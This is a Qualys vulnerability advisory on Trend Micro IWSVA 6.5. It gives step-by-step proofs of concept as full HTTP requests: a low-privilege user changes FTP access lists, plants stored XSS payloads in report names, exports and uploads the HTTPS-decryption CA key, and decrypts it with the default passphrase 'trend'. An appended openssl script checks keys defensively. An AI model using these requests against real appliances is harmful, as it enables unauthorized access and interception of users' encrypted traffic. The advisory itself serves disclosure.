Qualys Security Advisory QSA-2017-01-12 


January 12, 2017 


Multiple Vulnerabilities in Trend Micro Interscan Web Security Virtual Appliance (IWSVA) 6.5.x 


SYNOPSIS: 


Trend Micro InterScan Web Security Virtual Appliance (IWSVA) does not implement functional level access control properly.


Reference: 


http://downloadcenter.trendmicro.com/?prodid=86&regs=NABU 


http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6338


http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6339


http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6340


VULNERABILITY DETAILS: 


Vulnerability 1: Missing functional level access control allows an authenticated user to change the FTP Access Control settings


An authenticated, remote user with the least privileged role (a user with the 'Auditor' role) can change the 'FTP Access Control Settings' and add the IP address of their own machine to the allowed IP address list.


Vulnerable/Tested Version: 


InterScan Web Security Virtual Appliance version IWSVA 6.5-SP2 Critical Patch Build 1739. Older versions 
are also affected. 


[Screenshot: System Update page showing Application Version 6.5-SP2 Build Linux 1739 (OS Version 3.5.1321.el6.x86_64) and the installed patch history: Critical Patch Builds 1608, 1620, 1707, 1737 and 1739, and Hot Fix Build 1622.]


Risk Factor: Medium


Impact:


An attacker with read-only rights can change the 'FTP Access Control Settings' by sending a specially crafted POST request.


Proof-Of-Concept: 


1. Create a least privileged user 'Auditor' and assign it the 'Auditor' role.


[Screenshot: Login Accounts page listing the users admin (MasterAdminRole, Master Administrator), Auditor (Auditor role, AuditorUser), bob (Reports only) and test2 (Reports only).]


2. Log into the IWSVA web console with the least privileged user 'Auditor'.


[Screenshot: IWSVA web console dashboard after logging in as 'Auditor'.]


3. [Screenshot: FTP Access Control page (Client IP tab), viewed as admin: 'Enable FTP Access Based On Client IP' is checked and the allowed IP address list is empty.]


4. Make sure that you don't have FTP access:


root@kaps-virtual-machine:/# ftp 192.168.253.150
Connected to 192.168.253.150.
421-Your IP ( ) does not have access to the IWSVA server. Contact your network administrator.
421 Connection rejected
ftp> bye


5. Note down the 'CSRFGuardToken' and 'JSESSIONID' values for this session.


[Screenshot: browser developer tools showing the request headers (Cookie: JSESSIONID=...) and form data (CSRFGuardToken=...) of the Auditor session's POST to /password.jsp on 192.168.253.150:1812.]


6. Send the following POST request using Burp Suite Repeater with the 'CSRFGuardToken' and 'JSESSIONID' values obtained earlier. Follow redirections in Burp Suite to complete the request.


POST /ftp_clientip.jsp HTTP/1.1
Host: 192.168.253.150:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.253.150:1812/ftp_clientip.jsp
Cookie: JSESSIONID=443F1AAE87DC29CD98963E03039E9271
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 250

CSRFGuardToken=ESED4V87KWDVPEHWC4BYXW86SV9IW5EW&op=save&change_op=nochanged&daemonaction=8&input_tips=40+characters+maximum&ftp_use_client_acl=yes&use_client_acl_view=yes&input_type=ip&ip=192.168.253.133&desc=Ubuntu&itemlist=192.168.253.133+%3BUbuntu


7. This enables FTP access:


root@kaps-virtual-machine:/# ftp 192.168.253.150
Connected to 192.168.253.150.
220 IWSS FTP proxy ready
Name (192.168.253.150:root):


8. Now log into the IWSVA web console as admin from another browser and check that the FTP Access Control list has been updated:


[Screenshot: FTP Access Control page (Client IP tab) as admin: 'Enable FTP Access Based On Client IP' is checked and the allowed IP address list now contains 192.168.253.133 with the description 'Ubuntu'.]


Note: Per #3, the FTP ACL list did not contain any IP addresses, but FTP access based on client IP was still enabled. In either case, the above request adds an IP address to the list, wiping out any existing IP addresses.


Vulnerability 2: Stored Cross-Site Scripting (XSS)


An authenticated, remote attacker can inject JavaScript while creating a new report, which results in a stored cross-site scripting attack.


Risk Factor: Medium 


Impact: 


An attacker with low privileges can inject malicious JavaScript by sending a specially crafted POST request to add a new report (which, as with the missing access control in Vulnerability 1 above, this user should not be able to do).


Vulnerable Parameters: name

Note: Other parameters may be vulnerable.

CVSS Score: AV:N/AC:L/Au:S/C:N/I:P/A:N


Proof-Of-Concept: 


1. Create a least privileged user 'test' and assign it the 'Reports Only' role.

2. Log into the IWSVA web console with the least privileged user 'test'.

3. Note down the 'CSRFGuardToken' and 'JSESSIONID' values for this session.

4. Send the following POST requests using Burp Suite Repeater with the 'CSRFGuardToken' and 'JSESSIONID' values obtained earlier. Follow redirections in Burp Suite to complete the request.


Request#1:


POST /rest/commonlog/report/template HTTP/1.1
Host: 192.168.253.150:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.253.150:1812/report_action.jsp?CSRFGuardToken=EPCB6FAIRAK4393A74A9SYCRKR2(VZM&mode=edit&tid=19b59380-4a41-4134-81af-f7e2e6ce06d9
Content-Length: 88
Cookie: JSESSIONID=5F8A705062C1D9C14B0026F8C89D5CC8
Connection: close

{"action":"check_name","name":"TestReport1\<script\>alert(\"Hola Report!\")\</script\>"}


Request#2:


POST /rest/commonlog/report/template HTTP/1.1
Host: 192.168.253.150:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.253.150:1812/report_action.jsp?CSRFGuardToken=EPCB6FAIRAK4393A74A9SYCRKR2(VZM&mode=edit&tid=19b59380-4a41-4134-81af-f7e2e6ce06d9
Content-Length: 3041
Cookie: JSESSIONID=5F8A705062C1D9C14B0026F8C89D5CC8
Connection: close

{"action":"modify","tid":"19b59380-4a41-4134-81af-f7e2e6ce06d9","template":{
  "tid":"19b59380-4a41-4134-81af-f7e2e6ce06d9",
  "name":"TestReport1\<script\>alert(\"Hola Report!\")\</script\>",
  "description":"","enable":true,"period":"1D","from":-2209096400,"to":-2209096400,
  "frequency":0,"scheduled":false,"start_date":1481060520,"runtime":"0:0:0",
  "max_exec_number":0,"type":"PDF","list_number":10,"mail_enable":false,"mail_from":"",
  "mail_to":[""],"subject":"","message":"","mail_attach":false,"fail_notice":false,
  "fail_mail_to":[""],"report_by":0,"report_by_list":{},
  "reports":{
    "internet_security":[["top_malware_spyware_detection",10,true,[0]],["top_botnet_detection",10,true,[0]],
      ["top_advanced_threats_detection",10,true,[0]],["top_custom_defense_apt_blocking",10,true,[0]],
      ["c&c_contact_alert_count_by_date",0,true,[0]],["top_c&c_contact_ip_domains",10,true,[0]],
      ["top_users_hosts_detected_by_c&c_contact_alert",10,true,[0]],
      ["top_groups_detected_by_c&c_contact_alert",10,true,[0]],["top_malicious_sites_blocked",10,true,[0]],
      ["top_users_blocked_by_malware_spyware",10,true,[0]],["top_users_blocked_by_malicious_sites",10,true,[0]],
      ["top_groups_blocked_by_malware_spyware",10,true,[0]],["top_groups_blocked_by_malicious_site",10,true,[0]],
      ["top_users_by_bot_net_detection",10,true,[0]],["most_violation_for_http_malware_scan_policy",0,true,[0]],
      ["malicious_sites_blocked_by_date",0,true,[2]],["malware_spyware_detection_by_date",0,true,[2]],
      ["malware_spyware_detection_trend",0,true,[3]]],
    "internet_access":[["top_applications_visited",10,true,[0]],["top_url_categories_visited",10,true,[0]],
      ["top_sites_visited",10,true,[0]],["top_users_by_requests",10,true,[0]],["top_groups_by_requests",10,true,[0]],
      ["top_url_categories_by_browse_time",10,true,[0]],["top_sites_visited_by_browse_time",10,true,[0]],
      ["top_users_by_browse_time",10,true,[0]],["activity_level_by_days",0,true,[5]]],
    "bandwidth":[["top_url_categories_by_bandwidth",10,true,[0]],["top_applications_by_bandwidth",10,true,[0]],
      ["top_users_by_bandwidth",10,true,[0]],["top_groups_by_bandwidth",10,true,[0]],
      ["top_sites_by_bandwidth",10,true,[0]],["total_traffic_by_days",0,true,[3]]],
    "policy_enforcement":[["top_url_categories_blocked",10,true,[0]],["top_applications_blocked",10,true,[0]],
      ["top_users_enforced",10,true,[0]],["top_groups_enforced",10,true,[0]],["top_sites_blocked",10,true,[0]],
      ["top_users_by_http_inspection",10,true,[0]],["most_violation_for_url_filtering_policy",0,true,[0]],
      ["most_violation_for_application_control_policy",0,true,[0]],
      ["most_violation_for_access_quota_control_policy",0,true,[0]],
      ["most_violation_for_applets_and_activex_policy",0,true,[0]],
      ["most_violation_for_http_inspection_policy",0,true,[0]]],
    "data_security":[["top_dlp_templates_blocked_by_requests",10,true,[2]],["top_blocked_users",10,true,[0]],
      ["top_blocked_groups",10,true,[0]],["most_violation_for_data_loss_prevention_policy",0,true,[0]]],
    "custom_reports":[]},
  "last_gen_time":1481103598,"current_exec_time":1,"scheduled_time_filter":"0","device_group":"",
  "last_update_by":"test2"}}


5. Any user visiting the 'reports.jsp' and 'show_auditlog.jsp' pages will see the alert 'Hola Report!':


[Screenshot: alert dialog 'Hola Report!' displayed on reports.jsp (the report list for user test2 includes TestReport1, Last 1 Day(s), generated Thursday 01 Dec 2016 16:45 IST) and on 192.168.253.150:1812/show_auditlog.jsp.]


Vulnerability 3: Missing functional level access control allows an Auditor user to modify existing reports or create new ones, and thus to exploit the Stored Cross-Site Scripting vulnerability mentioned above


An authenticated, remote attacker with the 'Auditor' role can modify existing reports or create a new one. This user can also exploit the stored cross-site scripting vulnerability mentioned above.


Risk Factor: Medium 


Impact: 


An attacker with low privileges can create/modify reports and inject malicious JavaScript by sending a specially crafted POST request.


Vulnerable Parameters: name

Note: Other parameters may be vulnerable.

CVSS Score: AV:N/AC:L/Au:S/C:N/I:P/A:N


Proof-Of-Concept: 


1. Create a least privileged user 'Auditor' and assign it the 'Auditor' role.

2. Log into the IWSVA web console with the least privileged user 'Auditor'.

3. Note down the 'CSRFGuardToken' and 'JSESSIONID' values for this session.

4. Send the following POST requests using Burp Suite Repeater with the 'CSRFGuardToken' and 'JSESSIONID' values obtained earlier. Follow redirections in Burp Suite to complete the request.


Request#1:


POST /rest/commonlog/report/template HTTP/1.1
Host: 192.168.253.150:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.253.150:1812/report_action.jsp?CSRFGuardToken=5XODT278I1J9VZJ4PHUU2PJVPCGSYP&mode=add
Content-Length: 92
Cookie: JSESSIONID=E7002FCE8A03291749B1449541B9844C
Connection: close

{"action":"check_name","name":"AuditorsReport\<script\>alert(\"Hola Auditor!\")\</script\>"}


Request#2:


POST /rest/commonlog/report/template HTTP/1.1
Host: 192.168.253.150:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.253.150:1812/report_action.jsp?CSRFGuardToken=5XODT278I1J9VZJ4PHUU2PJVPCGSYP&mode=add
Content-Length: 2877
Cookie: JSESSIONID=E7002FCE8A03291749B1449541B9844C
Connection: close

{"action":"add","template":{
  "reports":{
    "internet_security":[["top_malware_spyware_detection",10,true,[0]],["top_botnet_detection",10,true,[0]],
      ["top_advanced_threats_detection",10,true,[0]],["top_custom_defense_apt_blocking",10,true,[0]],
      ["c&c_contact_alert_count_by_date",0,true,[0]],["top_c&c_contact_ip_domains",10,true,[0]],
      ["top_users_hosts_detected_by_c&c_contact_alert",10,true,[0]],
      ["top_groups_detected_by_c&c_contact_alert",10,true,[0]],["top_malicious_sites_blocked",10,true,[0]],
      ["top_users_blocked_by_malware_spyware",10,true,[0]],["top_users_blocked_by_malicious_sites",10,true,[0]],
      ["top_groups_blocked_by_malware_spyware",10,true,[0]],["top_groups_blocked_by_malicious_site",10,true,[0]],
      ["top_users_by_bot_net_detection",10,true,[0]],["most_violation_for_http_malware_scan_policy",0,true,[0]],
      ["malicious_sites_blocked_by_date",0,true,[2]],["malware_spyware_detection_by_date",0,true,[2]],
      ["malware_spyware_detection_trend",0,true,[3]]],
    "internet_access":[["top_applications_visited",10,true,[0]],["top_url_categories_visited",10,true,[0]],
      ["top_sites_visited",10,true,[0]],["top_users_by_requests",10,true,[0]],["top_groups_by_requests",10,true,[0]],
      ["top_url_categories_by_browse_time",10,true,[0]],["top_sites_visited_by_browse_time",10,true,[0]],
      ["top_users_by_browse_time",10,true,[0]],["activity_level_by_days",0,true,[5]]],
    "bandwidth":[["top_url_categories_by_bandwidth",10,true,[0]],["top_applications_by_bandwidth",10,true,[0]],
      ["top_users_by_bandwidth",10,true,[0]],["top_groups_by_bandwidth",10,true,[0]],
      ["top_sites_by_bandwidth",10,true,[0]],["total_traffic_by_days",0,true,[3]]],
    "policy_enforcement":[["top_url_categories_blocked",10,true,[0]],["top_applications_blocked",10,true,[0]],
      ["top_users_enforced",10,true,[0]],["top_groups_enforced",10,true,[0]],["top_sites_blocked",10,true,[0]],
      ["top_users_by_http_inspection",10,true,[0]],["most_violation_for_url_filtering_policy",0,true,[0]],
      ["most_violation_for_application_control_policy",0,true,[0]],
      ["most_violation_for_access_quota_control_policy",0,true,[0]],
      ["most_violation_for_applets_and_activex_policy",0,true,[0]],
      ["most_violation_for_http_inspection_policy",0,true,[0]]],
    "data_security":[["top_dlp_templates_blocked_by_requests",10,true,[2]],["top_blocked_users",10,true,[0]],
      ["top_blocked_groups",10,true,[0]],["most_violation_for_data_loss_prevention_policy",0,true,[0]]],
    "custom_reports":[]},
  "mail_to":[""],"fail_mail_to":[""],"description":"",
  "name":"AuditorsReport\<script\>alert(\"Hola Auditor!\")\</script\>",
  "enable":true,"frequency":0,"scheduled":false,"start_date":1484170920,"runtime":"3:12",
  "max_exec_number":0,"period":"1D","from":1484159400,"to":1484245800,"scheduled_time_filter":"0",
  "device_group":"","type":"PDF","list_number":10,"mail_enable":false,"mail_from":"","subject":"",
  "message":"","mail_attach":false,"fail_notice":false,"report_by":0,"report_by_list":{}}}


Note: An existing report can be modified by setting "action":"modify" and providing the appropriate report and template "tid".


5. Any user visiting the 'reports.jsp' and 'show_auditlog.jsp' pages will see the alert 'Hola Auditor!':


[Screenshot: alert dialog 'Hola Auditor!' displayed on 192.168.253.150:1812/show_auditlog.jsp.]


Vulnerability 4: Sensitive Information Disclosure


An authenticated, remote attacker with the least privileges ('Read-Only' or 'Auditor' role assigned) can download the HTTPS Decryption certificate and private key.


Risk Factor: High 


Impact: 


Per the IWSVA documentation, by default IWSVA acts as a private Certificate Authority (CA) and dynamically generates digital certificates that are sent to client browsers to complete a secure passage for HTTPS connections. It also allows administrators to upload their own certificates signed by a root CA. An attacker with low privileges can download the current CA certificate and private key (either the default ones or those uploaded by administrators) and use them to decrypt HTTPS traffic, thus compromising confidentiality.


Also, the default private key on this appliance is encrypted with the very weak and guessable passphrase 'trend'. If an appliance uses the default certificate and private key provided by Trend Micro, an attacker can simply download these and decrypt the private key using the default passphrase 'trend'.


CVSS Score: AV:N/AC:L/Au:S/C:C/I:C/A:N


Proof-Of-Concept: 


1. Create a least privileged user 'Test2' and assign it either the 'Auditor' or the 'Reports Only' role.

2. Log into the IWSVA web console with the least privileged user 'Test2'.

3. Note down the 'CSRFGuardToken' and 'JSESSIONID' values for this session.

4. Send the following POST requests using Burp Suite Repeater with the 'CSRFGuardToken' and 'JSESSIONID' values obtained earlier. Follow redirections in Burp Suite to complete the request.


Request#1:


POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=exportcert HTTP/1.1
Host: 192.168.253.150:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=564D4B2C0A9DE1B0700F9E0A19BFBF58
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

CSRFGuardToken=RHPK4UQEZBU6G6GVOBX9DYA2NLD3WPFW&op=save&defaultca=no&importca_certificate=&importca_key=&importca_passphrase=&importca_2passphrase=


Request#2:


POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=exportkey HTTP/1.1
Host: 192.168.253.150:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=564D4B2C0A9DE1B0700F9E0A19BFBF58
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

CSRFGuardToken=RHPK4UQEZBU6G6GVOBX9DYA2NLD3WPFW&op=save&defaultca=no&importca_certificate=&importca_key=&importca_passphrase=&importca_2passphrase=


5. The first request downloads the CA certificate 'get_current_ca_cert.cer' and the second one downloads the private key 'get_current_ca_key.cer'.


CA Certificate 




Encrypted Private Key 


Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,28B568992A78D7DB




6. Decrypt the private key using the passphrase 'trend':


root@kali:~/Desktop/TrendMicro# openssl rsa -in get_current_ca_key\(1\).cer -out decrypt_priv.key
Enter pass phrase for get_current_ca_key(1).cer:
writing RSA key
root@kali:~/Desktop/TrendMicro#


7. To confirm that the certificate and private key match, use the SSLShopper Certificate Key Matcher:


[Screenshot: SSLShopper Certificate Key Matcher with the CA certificate and the decrypted private key pasted in. Result: "The certificate and private key match." Certificate Modulus Hash: 7bb6b6de9c30fd969c5ad555e4939898; Key Modulus Hash: 7bb6b6de9c30fd969c5ad555e4939898.]
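The same two checks done locally with openssl, added here as an example and not part of the Qualys advisory: whether an exported IWSVA CA key is protected only by the default passphrase 'trend', and whether its RSA modulus matches the exported certificate (what the online matcher does). The certificate and keys it runs on are generated in the script as constructed samples; on a real export, point it at get_current_ca_cert.cer and get_current_ca_key.cer instead.

```shell
#!/bin/sh
# Added example, not from the Qualys advisory. Offline check of an exported
# IWSVA CA certificate/key pair using only openssl:
#   1. is the private key protected with the default passphrase "trend"?
#   2. does the key's RSA modulus match the certificate's modulus?
# The certificate and keys below are generated here as constructed samples.
set -eu

# key_protection KEYFILE -> PLAIN | DEFAULT | OTHER
#   PLAIN:   the file is not encrypted at all
#   DEFAULT: it decrypts with the advisory's default passphrase "trend"
#   OTHER:   it is encrypted with some other passphrase
key_protection() {
  # an unencrypted key loads no matter what passphrase is supplied
  if openssl rsa -in "$1" -passin pass:not-the-passphrase -noout >/dev/null 2>&1; then
    echo PLAIN
  elif openssl rsa -in "$1" -passin pass:trend -noout >/dev/null 2>&1; then
    echo DEFAULT
  else
    echo OTHER
  fi
}

# modulus_match CERTFILE KEYFILE PASSPHRASE -> MATCH | MISMATCH
#   Compares the RSA modulus embedded in the certificate with the one in the
#   private key, hashed with md5 the way the online matcher displays it.
modulus_match() {
  cert_mod=$(openssl x509 -in "$1" -noout -modulus | openssl md5)
  key_mod=$(openssl rsa -in "$2" -passin "pass:$3" -noout -modulus 2>/dev/null | openssl md5)
  if [ "$cert_mod" = "$key_mod" ]; then
    echo MATCH
  else
    echo MISMATCH
  fi
}

# ---- constructed sample material, standing in for get_current_ca_cert.cer
# ---- and get_current_ca_key.cer exported from the appliance ----
WORK=$(mktemp -d)
openssl genrsa -out "$WORK/ca_plain.key" 2048 2>/dev/null
openssl req -new -x509 -key "$WORK/ca_plain.key" -days 1 \
  -subj "/CN=sample IWSS root CA" -out "$WORK/ca_cert.cer" 2>/dev/null
# the same key encrypted the way the advisory's key was (3DES, passphrase "trend") ...
openssl rsa -in "$WORK/ca_plain.key" -des3 -passout pass:trend \
  -out "$WORK/ca_default.key" 2>/dev/null
# ... the same key under an operator-chosen passphrase, and an unrelated key
openssl rsa -in "$WORK/ca_plain.key" -des3 -passout "pass:correct horse battery" \
  -out "$WORK/ca_strong.key" 2>/dev/null
openssl genrsa -out "$WORK/unrelated.key" 2048 2>/dev/null

echo "default-passphrase key: $(key_protection "$WORK/ca_default.key")"   # DEFAULT
echo "strong-passphrase key:  $(key_protection "$WORK/ca_strong.key")"    # OTHER
echo "cert vs default key:    $(modulus_match "$WORK/ca_cert.cer" "$WORK/ca_default.key" trend)"   # MATCH
echo "cert vs unrelated key:  $(modulus_match "$WORK/ca_cert.cer" "$WORK/unrelated.key" trend)"    # MISMATCH
```

A DEFAULT result on a production appliance means the key material can be read by anyone who can reach the export endpoint, regardless of the access control fix; MATCH confirms the exported pair actually belongs together before it is rotated.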


Vulnerability 5: Missing functional level access control allows a low privileged user to upload the HTTPS Decryption Certificate and Private Key


An authenticated, remote attacker with low privileges ('Reports Only' or 'Auditor' role assigned) can upload the HTTPS Decryption certificate and private key.


Risk Factor: 


Impact: 


Per IWSVA documentation, by default, IWSVA acts as a private Certificate Authority (CA) and dynamically 
generates digital certificates that are sent to client browsers to complete a secure passage for HTTPS 
connections. It also allows administrators to upload their own certificates signed by root CA. 


An attacker with low privileges can upload a new CA certificate and private key and use them to decrypt HTTPS traffic, thus compromising confidentiality.


CVSS Score: AV:N/AC:L/Au:S/C:C/I:C/A:N


Proof-Of-Concept: 


1. Create a least privileged user 'Test2' and assign it either the 'Auditor' or the 'Reports Only' role.

2. Log into the IWSVA web console with the least privileged user 'Test2'.

3. Note down the 'CSRFGuardToken' and 'JSESSIONID' values for this session.

4. Send the following POST request using Burp Suite Repeater with the 'CSRFGuardToken' and 'JSESSIONID' values obtained earlier. Follow redirections in Burp Suite to complete the request.


Request:


POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=import HTTP/1.1
Host: 192.168.253.150:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7e11fd2fd0ac0
Content-Length: 4085
Pragma: no-cache
Cookie: JSESSIONID=E595855EF5900782921945280ABA46CD
Connection: close

-----------------------------7e11fd2fd0ac0
Content-Disposition: form-data; name="CSRFGuardToken"

S8PM5QG974XLWS992MCK5M67T6D0A575
-----------------------------7e11fd2fd0ac0
Content-Disposition: form-data; name="op"

save
-----------------------------7e11fd2fd0ac0
Content-Disposition: form-data; name="defaultca"

no
-----------------------------7e11fd2fd0ac0
Content-Disposition: form-data; name="importca_certificate"; filename="get_current_ca_cert(2).cer"
Content-Type: application/x-x509-ca-cert

-----BEGIN CERTIFICATE-----
[base64-encoded certificate body]
-----END CERTIFICATE-----
-----------------------------7e11fd2fd0ac0
Content-Disposition: form-data; name="importca_key"; filename="get_current_ca_key(1).cer"
Content-Type: application/x-x509-ca-cert

-----BEGIN RSA PRIVATE KEY-----
[base64-encoded private key body]
-----END RSA PRIVATE KEY-----
-----------------------------7e11fd2fd0ac0--


Response:


HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Location: http://192.168.253.150:1812/httpsdecrypt_root_ca.jsp?CSRFGuardToken=S8PM5QG974XLWS992MCK5M67T6D0A575&fromUpload=yes
Content-Length: 0
Date: Wed, 18 Jan 2017 09:46:37 GMT
Connection: close


5. The above request deletes the existing certificate and key and adds the new ones. To confirm that the certificate and private key were uploaded successfully, log in with the Administrator account and download the certificate/key. These should be the ones that you uploaded earlier.


CREDITS: 


The discovery and documentation of these vulnerabilities was conducted by Kapil Khot, Qualys Vulnerability Signature/Research Team.


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at http://www.qualys.com or send email to research@qualys.com


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


